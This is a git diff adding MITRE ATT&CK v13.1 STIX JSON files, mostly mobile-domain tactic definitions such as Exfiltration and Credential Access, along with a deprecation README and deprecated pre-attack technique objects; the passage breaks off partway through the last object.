b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981.json new file mode 100644 index 0000000000000000000000000000000000000000..5e98321260189c4a1ce25278c09e21306e671006 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a51ac7ef-bf20-43c3-9d29-fd6b24ff1cfd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0036", + "url": "https://attack.mitre.org/tactics/TA0036", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:42.009Z", + "name": "Exfiltration", + "description": "The adversary is trying to steal data.\n\nExfiltration refers to techniques and attributes that result or aid in the adversary removing files and information from the targeted mobile device.\n\nIn the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "exfiltration" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54.json new file mode 100644 index 0000000000000000000000000000000000000000..64a141a58197751c01ab2cf2e9ebb98a2db804b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c696cc12-32dc-4f36-904d-d2d3160610d4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0028", + "url": "https://attack.mitre.org/tactics/TA0028", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:15.455Z", + "name": "Persistence", + "description": " The adversary is trying to maintain their foothold.\n\nPersistence is any access, action, or configuration change to a mobile device that gives an attacker a persistent presence on the device. Attackers often will need to maintain access to mobile devices through interruptions such as device reboots and potentially even factory data resets.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "persistence" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8.json new file mode 100644 index 0000000000000000000000000000000000000000..dc35918e76a4ea99b44bebe82fa26998f8f89a92 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--fda64103-db36-4894-bd9d-0ad5cf812e8f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0029", + "url": "https://attack.mitre.org/tactics/TA0029", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:49.343Z", + "name": "Privilege Escalation", + "description": " The adversary is trying to gain higher-level permissions.\n\nPrivilege escalation includes techniques that allow an attacker to obtain a higher level of permissions on the mobile device. Attackers may enter the mobile device with very limited privileges and may be required to take advantage of a device weakness to obtain higher privileges necessary to successfully carry out their mission objectives.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "privilege-escalation" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3.json new file mode 100644 index 0000000000000000000000000000000000000000..b42b211de206a467fd5363df979c19aca39c2ade --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--3df1208e-3dc6-4bb9-a03d-ebbe96660545", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0037", + "url": "https://attack.mitre.org/tactics/TA0037", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:59.132Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with compromised devices to control them.\n\nThe command and control tactic represents how adversaries communicate with systems under their control within a target network. There are many ways an adversary can establish command and control with various levels of covertness, depending on system configuration and network topology. Due to the wide degree of variation available to the adversary at the network level, only the most common factors were used to describe the differences in command and control. There are still a great many specific techniques within the documented methods, largely due to how easy it is to define new protocols and use existing, legitimate protocols and network services for communication. \n\nThe resulting breakdown should help convey the concept that detecting intrusion through command and control protocols without prior knowledge is a difficult proposition over the long term. Adversaries' main constraints in network-level defense avoidance are testing and deployment of tools to rapidly change their protocols, awareness of existing defensive technologies, and access to legitimate Web services that, when used appropriately, make their tools difficult to distinguish from benign traffic.\n\nAdditionally, in the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "command-and-control" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756.json new file mode 100644 index 0000000000000000000000000000000000000000..6a9121e0b55586c4f9cceadf3a1e6c316a4c010d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8231ef22-d43a-4a87-8a0f-ce4542ee34ab", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "type": "x-mitre-tactic", + "created": "2020-01-27T14:00:49.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0041", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0041" + } + ], + "modified": "2020-01-27T14:00:49.089Z", + "name": "Execution", + "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a mobile device. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "execution" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e.json new file mode 100644 index 0000000000000000000000000000000000000000..0c94ca893f1a7b96228e7ee1e3c91e1569955b96 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--e9f56564-292a-4db4-9c7b-5ef26e84e012", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0034", + "url": "https://attack.mitre.org/tactics/TA0034", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:15.308Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your devices and data.\n\nThe impact tactic consists of techniques used by the adversary to execute his or her mission objectives but that do not cleanly fit into another category such as Collection. Mission objectives vary based on each adversary's goals, but examples include toll fraud, destruction of device data, or locking the user out of his or her device until a ransom is paid.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "impact" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10.json new file mode 100644 index 0000000000000000000000000000000000000000..4ec0d94a2cbbe7e974bea8e5848383a05b3ced73 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a6613e71-6917-4ebd-82a3-67089ca67edc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0031", + "url": "https://attack.mitre.org/tactics/TA0031", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:02.718Z", + "name": "Credential Access", + "description": "The adversary is trying to steal account names, passwords, or other secrets that enable access to resources.\n\nCredential access represents techniques that can be used by adversaries to obtain access to or control over passwords, tokens, cryptographic keys, or other values that could be used by an adversary to gain unauthorized access to resources. Credential access allows the adversary to assume the identity of an account, with all of that account's permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "credential-access" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba.json new file mode 100644 index 0000000000000000000000000000000000000000..99c58e9efca9f9dff98b740d17b4fdaffe54b179 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7e6bce62-7e05-4139-9243-e538cbe9c372", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0035", + "url": "https://attack.mitre.org/tactics/TA0035", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:10.915Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "collection" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f.json new file mode 100644 index 0000000000000000000000000000000000000000..6430906954fb076d196eec49a34b9749ad3553a3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ae081da6-a00b-421b-94b0-d325ce3bb91c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0033", + "url": "https://attack.mitre.org/tactics/TA0033", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:37.854Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your environment.\n\nLateral movement consists of techniques that enable an adversary to access and control remote systems on a network and could, but does not necessarily, include execution of tools on remote systems. The lateral movement techniques could allow an adversary to gather information from a system without needing additional tools, such as a remote access tool.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "lateral-movement" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df.json new file mode 100644 index 0000000000000000000000000000000000000000..0f22757be8ab2aed614d4df96b6b3fd4ad601aad --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4a021dda-0950-43dc-9570-b431b667e116", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0030", + "url": "https://attack.mitre.org/tactics/TA0030", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:04:46.497Z", + "name": "Defense Evasion", + "description": " The adversary is trying to avoid being detected.\n\nDefense evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as or variations of techniques in other categories that have the added benefit of subverting a particular defense or mitigation. Defense evasion may be considered a set of attributes the adversary applies to all other phases of the operation.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "defense-evasion" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210.json new file mode 100644 index 0000000000000000000000000000000000000000..487a24461c22927db2f78e36cf2e94657f575d1c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--81031e9d-fff8-4a4d-8910-f277a9bc8ff0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-07T21:01:17.781Z", + "name": "Network Effects", + "description": "The adversary is trying to intercept or manipulate network traffic to or from a device.\n\nThis category refers to network-based techniques that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself. These include techniques to intercept or manipulate network traffic to and from the mobile device.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "network-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0038", + "external_id": "TA0038" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1.json new file mode 100644 index 0000000000000000000000000000000000000000..648321ba6614b796aea0372ea387158abc776f0c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--40759d9d-4a98-4b9d-9e3b-65feb5311124", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0032", + "url": "https://attack.mitre.org/tactics/TA0032", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:00.466Z", + "name": "Discovery", + "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques that allow the adversary to gain knowledge about the characteristics of the mobile device and potentially other networked systems. When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion. The operating system may provide capabilities that aid in this post-compromise information-gathering phase.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "discovery" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17.json new file mode 100644 index 0000000000000000000000000000000000000000..99c150efa35cbe42547f0c53fdede7e687901170 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--4d8dee21-bbff-49dd-a8d3-96a09a77cb5a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-07T21:01:36.112Z", + "name": "Remote Service Effects", + "description": "The adversary is trying to control or monitor the device using remote services.\n\nThis category refers to techniques involving remote services, such as vendor-provided cloud services (e.g. Google Drive, Google Find My Device, or Apple iCloud), or enterprise mobility management (EMM)/mobile device management (MDM) services that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "remote-service-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0039", + "external_id": "TA0039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/parse_data.py b/cti-ATT-CK-v13.1/parse_data.py new file mode 100644 index 0000000000000000000000000000000000000000..bdbe434f75833822535ec0af746769512b73c481 --- /dev/null +++ b/cti-ATT-CK-v13.1/parse_data.py @@ -0,0 +1 @@ +filename = "cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json" \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/README.md b/cti-ATT-CK-v13.1/pre-attack/README.md new file mode 100644 index 0000000000000000000000000000000000000000..f4bc0f3747dda52ddb5e9cf1a9cd75c51dd36382 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/README.md @@ -0,0 +1,3 @@ +# ⚠ pre-ATT&CK is deprecated + +As of ATT&CK version 8.0, the entire pre-ATT&CK domain has been [deprecated](https://github.com/mitre/cti/blob/master/USAGE.md#working-with-deprecated-and-revoked-objects) in favor of two new tactics in the Enterprise domain tagged with the `PRE` platform. Please see the new [PRE matrix](https://attack.mitre.org/matrices/enterprise/PRE/) for the replacing Enterprise tactics and techniques. All objects within the pre-ATT&CK domain have been marked as deprecated, along with a new description pointing to their new home in Enterprise. \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88.json new file mode 100644 index 0000000000000000000000000000000000000000..f6c17493f9a9998136bff9e78dd75114cf0e903b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--26bef19b-a15a-4914-9edf-b8c7b72b00b9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1277).\n\nData sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1277", + "external_id": "T1277" + }, + { + "source_name": "SANSThreatProfile", + "description": "Stephen Irwin. (2014, September 8). Creating a Threat Profile for Your Organization. Retrieved March 5, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + }, + { + "source_name": "isight-osint", + "description": "Dawn Lomer. (2017). 101+ OSINT Resources for Investigators. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1054", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400.json new file mode 100644 index 0000000000000000000000000000000000000000..6a3c714bad3a62d2cc8245ff6a9f171391868c3d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--f321f2f5-8107-45c0-aacd-8d447d00bf1c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Submit KITs, KIQs, and intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1237).\n\nOnce they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. 